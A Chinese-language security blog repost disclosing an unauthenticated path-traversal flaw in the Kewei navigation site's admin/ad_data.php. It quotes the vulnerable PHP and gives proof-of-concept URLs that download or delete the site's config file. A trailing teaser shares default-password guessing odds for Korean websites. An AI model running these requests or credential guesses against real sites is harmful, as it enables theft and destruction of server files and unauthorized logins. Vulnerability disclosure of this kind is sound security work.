科威网址导航系统任意下载、删除文件漏洞

2021年4月3日18:55:50评论24 views字数 661阅读2分12秒阅读模式

垃圾网址导航程序，内核盗用别人的程序还拿去卖钱。鸡肋漏洞，看分析。。

在文件“adminad_data.php”中，备份还原数据库功能，没有进行管理登录验证。经典对白，看代码。

存在问题的代码：

case 'down':
    $filename or message('文件名不能为空');
    file_down('../data/'.$filename);
    break;

case 'delete':
    unlink("../data/{$_GET['filenames']}");
    message("文件{$_GET['filenames']}删除成功");
    break;

任意文件下载漏洞演示：
http://127.0.0.1/admin/ad_data.php?action=down&filename=../include/config_inc.php

任意文件删除漏洞演示：
http://127.0.0.1/admin/ad_data.php?action=delete&filename=../include/config_inc.php

文章来源于lcx.cc:科威网址导航系统任意下载、删除文件漏洞

相关推荐: 【转载】韩国棒子网站的一些弱口令

这几天因为一些事，一直再搞韩国棒子的站。给一点弱口令，给大家和国内完全不一样。暂时把账号表达为：username 账号一般为：域名和 admin，其他就要猜了，域名的概率为：10%，admin：30%。密码一般是：0000，…

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

Php安全新闻早8点（2011-11-17 星期四） - 技术文章